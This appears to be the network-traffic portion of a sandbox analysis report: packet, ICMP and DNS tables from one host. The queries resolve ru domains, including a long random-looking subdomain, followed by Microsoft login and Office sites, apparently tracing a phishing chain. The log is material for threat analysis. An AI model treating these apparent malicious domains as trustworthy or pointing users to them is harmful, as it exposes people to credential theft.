                                                                  Jan 13, 2025 22:53:16.837762117 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:17.474097013 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:17.474410057 CET49884443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:53:17.474450111 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:17.474747896 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:17.475327969 CET49884443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:53:17.475380898 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:17.524182081 CET49884443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:53:20.006777048 CET4972480192.168.2.42.16.168.117
                                                                  Jan 13, 2025 22:53:20.033516884 CET80497242.16.168.117192.168.2.4
                                                                  Jan 13, 2025 22:53:20.033756971 CET4972480192.168.2.42.16.168.117
                                                                  Jan 13, 2025 22:53:27.386364937 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:27.386594057 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:27.386687040 CET49884443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:53:27.620340109 CET49884443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:53:27.620384932 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:30.695712090 CET4996953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:30.700615883 CET53499691.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:30.700700045 CET4996953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:30.700793028 CET4996953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:30.700825930 CET4996953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:30.705641985 CET53499691.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:30.705672026 CET53499691.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:30.711376905 CET4996953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:30.759641886 CET53499691.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:31.055805922 CET53499691.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:31.055883884 CET4996953192.168.2.41.1.1.1
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 13, 2025 22:52:12.928873062 CET53530121.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:13.419997931 CET53530071.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:14.390465975 CET53492401.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:16.776690006 CET5902253192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:16.776798964 CET5620053192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:16.783936977 CET53590221.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:16.783981085 CET53562001.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:19.352545977 CET6134053192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:19.352746964 CET5799953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:20.343539953 CET5888753192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:20.343540907 CET4940353192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:20.350099087 CET53588871.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:20.350406885 CET53494031.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:25.014203072 CET5220753192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:25.014313936 CET5484153192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:25.027817965 CET53522071.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:25.200669050 CET53548411.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:25.986922979 CET6303253192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:25.987334967 CET5988553192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:26.080182076 CET53630321.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:26.279129982 CET53598851.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:27.585242987 CET5542453192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:27.585366964 CET5423153192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:27.587340117 CET5486053192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:27.587340117 CET6312553192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:27.587913036 CET5302253192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:27.588409901 CET5440553192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:27.591890097 CET53554241.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:27.592267036 CET53542311.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:27.593877077 CET53631251.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:27.594101906 CET53548601.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:27.594635963 CET53530221.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:27.595716953 CET53544051.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:28.325387001 CET5052553192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:28.325516939 CET5443153192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:28.332413912 CET53505251.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:28.332425117 CET53544311.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:28.373994112 CET6181953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:28.374119997 CET5612853192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:28.381649971 CET53561281.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:28.381700039 CET53618191.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:28.972599030 CET5191453192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:28.972858906 CET5570053192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:28.979660034 CET53519141.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:28.979798079 CET53557001.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:29.002690077 CET5321853192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:29.003037930 CET5085353192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:29.009335995 CET53532181.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:29.010410070 CET53508531.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:30.664067030 CET5067253192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:30.664479017 CET5114153192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:30.670852900 CET53506721.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:30.671130896 CET53511411.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.370481014 CET53635001.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.736166000 CET138138192.168.2.4192.168.2.255
                                                                  Jan 13, 2025 22:52:40.122035980 CET5636153192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:40.122165918 CET5151253192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:40.170682907 CET53563611.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.211968899 CET53515121.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.218409061 CET6236553192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:41.218540907 CET6449053192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:41.223838091 CET4992953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:41.223948956 CET4918453192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:41.383522987 CET53499291.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.464448929 CET53491841.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:42.270272970 CET6507953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:42.270478964 CET6315153192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:42.277251959 CET53631511.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:44.736989975 CET5868653192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:44.737112045 CET5462253192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:44.776961088 CET53546221.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:45.864675999 CET6256753192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:45.864758968 CET6131453192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:52:45.872126102 CET53625671.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:45.872534037 CET53613141.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:50.409596920 CET53628691.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:52:51.414520025 CET53492251.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:01.593333006 CET6312953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:01.593528986 CET5035153192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:12.732090950 CET53631321.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:13.438998938 CET53529051.1.1.1192.168.2.4
                                                                  Jan 13, 2025 22:53:30.666558027 CET5106553192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:30.666987896 CET6387953192.168.2.41.1.1.1
                                                                  Jan 13, 2025 22:53:30.695200920 CET53638791.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                  Jan 13, 2025 22:52:25.200783014 CET192.168.2.41.1.1.1c22b(Port unreachable)Destination Unreachable
                                                                  Jan 13, 2025 22:52:26.279308081 CET192.168.2.41.1.1.1c27c(Port unreachable)Destination Unreachable
                                                                  Jan 13, 2025 22:52:40.212114096 CET192.168.2.41.1.1.1c311(Port unreachable)Destination Unreachable
                                                                  Jan 13, 2025 22:52:41.464521885 CET192.168.2.41.1.1.1c311(Port unreachable)Destination Unreachable
                                                                  Jan 13, 2025 22:52:44.777241945 CET192.168.2.41.1.1.1c26b(Port unreachable)Destination Unreachable
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 13, 2025 22:52:16.776690006 CET192.168.2.41.1.1.10x2eb4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:16.776798964 CET192.168.2.41.1.1.10x9736Standard query (0)www.google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:19.352545977 CET192.168.2.41.1.1.10x9752Standard query (0)www.tiktok.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:19.352746964 CET192.168.2.41.1.1.10x39efStandard query (0)www.tiktok.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:20.343539953 CET192.168.2.41.1.1.10x3394Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:20.343540907 CET192.168.2.41.1.1.10x7762Standard query (0)google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:25.014203072 CET192.168.2.41.1.1.10xd013Standard query (0)ilikethislife.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:25.014313936 CET192.168.2.41.1.1.10x9df3Standard query (0)ilikethislife.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:25.986922979 CET192.168.2.41.1.1.10xc3c9Standard query (0)rfll.yordickyel.ruA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:25.987334967 CET192.168.2.41.1.1.10x943bStandard query (0)rfll.yordickyel.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.585242987 CET192.168.2.41.1.1.10x3cb6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.585366964 CET192.168.2.41.1.1.10x3eb1Standard query (0)code.jquery.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.587340117 CET192.168.2.41.1.1.10xd94aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.587340117 CET192.168.2.41.1.1.10x77a7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.587913036 CET192.168.2.41.1.1.10x250Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.588409901 CET192.168.2.41.1.1.10xd79dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.325387001 CET192.168.2.41.1.1.10xbd3dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.325516939 CET192.168.2.41.1.1.10x65d5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.373994112 CET192.168.2.41.1.1.10x108bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.374119997 CET192.168.2.41.1.1.10x2cefStandard query (0)code.jquery.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.972599030 CET192.168.2.41.1.1.10xd47Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.972858906 CET192.168.2.41.1.1.10x5088Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:29.002690077 CET192.168.2.41.1.1.10x4eb0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:29.003037930 CET192.168.2.41.1.1.10x7964Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:30.664067030 CET192.168.2.41.1.1.10x6795Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:30.664479017 CET192.168.2.41.1.1.10x92d7Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.122035980 CET192.168.2.41.1.1.10x88b6Standard query (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ruA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.122165918 CET192.168.2.41.1.1.10xb26Standard query (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.218409061 CET192.168.2.41.1.1.10x1ddcStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.218540907 CET192.168.2.41.1.1.10x80b5Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.223838091 CET192.168.2.41.1.1.10x8265Standard query (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ruA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.223948956 CET192.168.2.41.1.1.10x419cStandard query (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:42.270272970 CET192.168.2.41.1.1.10x498eStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:42.270478964 CET192.168.2.41.1.1.10x2ee6Standard query (0)www.office.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.736989975 CET192.168.2.41.1.1.10xa9acStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.737112045 CET192.168.2.41.1.1.10xb573Standard query (0)www.office.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:45.864675999 CET192.168.2.41.1.1.10xe033Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:45.864758968 CET192.168.2.41.1.1.10x714fStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                  Jan 13, 2025 22:53:01.593333006 CET192.168.2.41.1.1.10xa5d4Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:53:01.593528986 CET192.168.2.41.1.1.10xc09aStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:53:30.666558027 CET192.168.2.41.1.1.10xd68fStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:53:30.666987896 CET192.168.2.41.1.1.10x1591Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 13, 2025 22:52:16.783936977 CET1.1.1.1192.168.2.40x2eb4No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:16.783981085 CET1.1.1.1192.168.2.40x9736No error (0)www.google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:19.360116005 CET1.1.1.1192.168.2.40x9752No error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:19.360440969 CET1.1.1.1192.168.2.40x39efNo error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:20.350099087 CET1.1.1.1192.168.2.40x3394No error (0)google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:20.350406885 CET1.1.1.1192.168.2.40x7762No error (0)google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:25.027817965 CET1.1.1.1192.168.2.40xd013No error (0)ilikethislife.com103.83.194.55A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:26.080182076 CET1.1.1.1192.168.2.40xc3c9No error (0)rfll.yordickyel.ru104.21.92.210A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:26.080182076 CET1.1.1.1192.168.2.40xc3c9No error (0)rfll.yordickyel.ru172.67.198.166A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:26.279129982 CET1.1.1.1192.168.2.40x943bNo error (0)rfll.yordickyel.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.591890097 CET1.1.1.1192.168.2.40x3cb6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.591890097 CET1.1.1.1192.168.2.40x3cb6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.591890097 CET1.1.1.1192.168.2.40x3cb6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.591890097 CET1.1.1.1192.168.2.40x3cb6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.593877077 CET1.1.1.1192.168.2.40x77a7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.594101906 CET1.1.1.1192.168.2.40xd94aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.594101906 CET1.1.1.1192.168.2.40xd94aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.594635963 CET1.1.1.1192.168.2.40x250No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.594635963 CET1.1.1.1192.168.2.40x250No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:27.595716953 CET1.1.1.1192.168.2.40xd79dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.332413912 CET1.1.1.1192.168.2.40xbd3dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.332413912 CET1.1.1.1192.168.2.40xbd3dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.332425117 CET1.1.1.1192.168.2.40x65d5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.381700039 CET1.1.1.1192.168.2.40x108bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.381700039 CET1.1.1.1192.168.2.40x108bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.381700039 CET1.1.1.1192.168.2.40x108bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.381700039 CET1.1.1.1192.168.2.40x108bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.979660034 CET1.1.1.1192.168.2.40xd47No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.979660034 CET1.1.1.1192.168.2.40xd47No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:28.979798079 CET1.1.1.1192.168.2.40x5088No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:29.009335995 CET1.1.1.1192.168.2.40x4eb0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:29.009335995 CET1.1.1.1192.168.2.40x4eb0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:29.010410070 CET1.1.1.1192.168.2.40x7964No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:30.670852900 CET1.1.1.1192.168.2.40x6795No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.170682907 CET1.1.1.1192.168.2.40x88b6No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.170682907 CET1.1.1.1192.168.2.40x88b6No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.170682907 CET1.1.1.1192.168.2.40x88b6No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.170682907 CET1.1.1.1192.168.2.40x88b6No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.170682907 CET1.1.1.1192.168.2.40x88b6No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.170682907 CET1.1.1.1192.168.2.40x88b6No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.170682907 CET1.1.1.1192.168.2.40x88b6No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:40.211968899 CET1.1.1.1192.168.2.40xb26No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.225913048 CET1.1.1.1192.168.2.40x1ddcNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.225950003 CET1.1.1.1192.168.2.40x80b5No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.383522987 CET1.1.1.1192.168.2.40x8265No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.383522987 CET1.1.1.1192.168.2.40x8265No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.383522987 CET1.1.1.1192.168.2.40x8265No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.383522987 CET1.1.1.1192.168.2.40x8265No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.383522987 CET1.1.1.1192.168.2.40x8265No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.383522987 CET1.1.1.1192.168.2.40x8265No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.383522987 CET1.1.1.1192.168.2.40x8265No error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:41.464448929 CET1.1.1.1192.168.2.40x419cNo error (0)votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:52:42.276815891 CET1.1.1.1192.168.2.40x498eNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:42.276815891 CET1.1.1.1192.168.2.40x498eNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:42.277251959 CET1.1.1.1192.168.2.40x2ee6No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:42.277251959 CET1.1.1.1192.168.2.40x2ee6No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:43.603893995 CET1.1.1.1192.168.2.40x6898No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:43.603893995 CET1.1.1.1192.168.2.40x6898No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.744961977 CET1.1.1.1192.168.2.40xa9acNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.744961977 CET1.1.1.1192.168.2.40xa9acNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.752876043 CET1.1.1.1192.168.2.40x876fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.752876043 CET1.1.1.1192.168.2.40x876fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.776961088 CET1.1.1.1192.168.2.40xb573No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:44.776961088 CET1.1.1.1192.168.2.40xb573No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:45.872126102 CET1.1.1.1192.168.2.40xe033No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:45.872126102 CET1.1.1.1192.168.2.40xe033No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:45.872126102 CET1.1.1.1192.168.2.40xe033No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
